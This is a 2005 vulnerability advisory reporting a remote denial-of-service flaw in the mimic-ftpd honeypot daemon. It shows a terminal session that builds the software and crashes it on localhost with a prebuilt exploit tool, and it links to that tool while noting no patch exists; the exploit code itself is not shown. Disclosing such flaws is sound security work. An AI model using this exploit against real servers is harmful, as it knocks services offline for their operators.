mimic-ftpd remote DoS vulnerability. number: #12 author: Dark Eagle date: 18.02.05 vendor: http://mimic.sourceforge.net status: NO-PATCHES overview: mimic sits in the background as a daemon and imitates particular services. So far it has the ability to imitate ftpd and telnetd servers. -- DE: lol mimic loves to laugh at people doing silly things and he records everything so that you can laugh too. If you mimic an ftp server, then clients connecting to your ftp server will see nothing wrong. -- DE: so now, we are laughing at MIMIC :) details: [darkeagle@localhost research]$ tar xzvf mimic-1.0.tar.gz mimic-1.0/ mimic-1.0/include/ mimic-1.0/include/shared.h mimic-1.0/include/api.h mimic-1.0/src/ mimic-1.0/src/parse.c mimic-1.0/src/api.c mimic-1.0/src/script.c mimic-1.0/src/log.c mimic-1.0/src/ftpd.c mimic-1.0/src/mimic.c mimic-1.0/src/telnetd.c mimic-1.0/README mimic-1.0/script/ mimic-1.0/script/script.conf mimic-1.0/script/welcome.msg.script mimic-1.0/ftpd/ mimic-1.0/ftpd/welcome.msg.ftpd mimic-1.0/ftpd/ftpd.conf mimic-1.0/INSTALL mimic-1.0/Makefile mimic-1.0/telnetd/ mimic-1.0/telnetd/welcome.msg.telnetd mimic-1.0/telnetd/telnetd.conf [darkeagle@localhost research]$ cd mimic-1.0 [darkeagle@localhost mimic-1.0]$ make /usr/bin/gcc src/api.c src/log.c src/mimic.c src/parse.c src/ftpd.c -o ftpd/mimic-ftpd -pthread /usr/bin/gcc src/api.c src/log.c src/mimic.c src/parse.c src/telnetd.c -o telnetd/mimic-telnetd -pthread [darkeagle@localhost mimic-1.0]$ cd ftpd [darkeagle@localhost ftpd]$ ls ftpd.conf mimic-ftpd* welcome.msg.ftpd [darkeagle@localhost ftpd]$ ./mimic-ftpd Can't read configuration file: default.conf Try: ./mimic-ftpd [darkeagle@localhost ftpd]$ ./mimic-ftpd ftpd.conf Port: 21000 Logfile: /var/log/mimic-ftpd.log Welcomefile: welcome.msg.ftpd Options: NONE [darkeagle@localhost ftpd]$ telnet localhost 21000 Trying 127.0.0.1... Connected to localhost.localdomain (127.0.0.1). Escape character is '^]'. 220 localhost FTP server (Version FTPD-2.1.4(1) 18 21:54:00 ALMT 2005) ready. lolers! 530 Please login with USER and PASS. quit 221 Goodbye. Connection closed by foreign host. [darkeagle@localhost ftpd]$ cp /home/darkeagle/deadly-mimic /home/darkeagle/research/mimic-1.0/ftpd/deadly-mimic [darkeagle@localhost ftpd]$ ls deadly-mimic* ftpd.conf mimic-ftpd* welcome.msg.ftpd [darkeagle@localhost ftpd]$ ./deadly-mimic mimic-ftpd remote DOS exploit by Dark Eagle [Unl0ck Team] http://unl0ck.void.ru usage: ./deadly-mimic (c) 2005 uKt research [darkeagle@localhost ftpd]$ ./deadly-mimic 127.0.0.1 21000 mimic-ftpd remote DOS exploit by Dark Eagle [Unl0ck Team] http://unl0ck.void.ru Info [*] IP 127.0.0.1 [*] Port 21000 [+] Attacking... Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused telnet: Unable to connect to remote host: Connection refused [darkeagle@localhost ftpd]$ telnet localhost 21000 Trying 127.0.0.1... telnet: connect to address 127.0.0.1: Connection refused telnet: Unable to connect to remote host: Connection refused [darkeagle@localhost ftpd]$ echo "IT'S BIG LOL" IT'S BIG LOL [darkeagle@localhost ftpd]$ So, you can see, that this sh1t is very lol_ly :) So, now we are laughing at this sh1t :) DoS'er, you can download from: http://unl0ck.void.ru/releases.htm greetz: all my greetz go out to: nekd0 [Happy birthday, man!] 0xdeadbabe [dead babe never die!] antiq [where are you, dude?] 8ron [where are you too?] CoKi [best coder] all GOTFault crew [best researchers] (c) uKt Research 2004-2005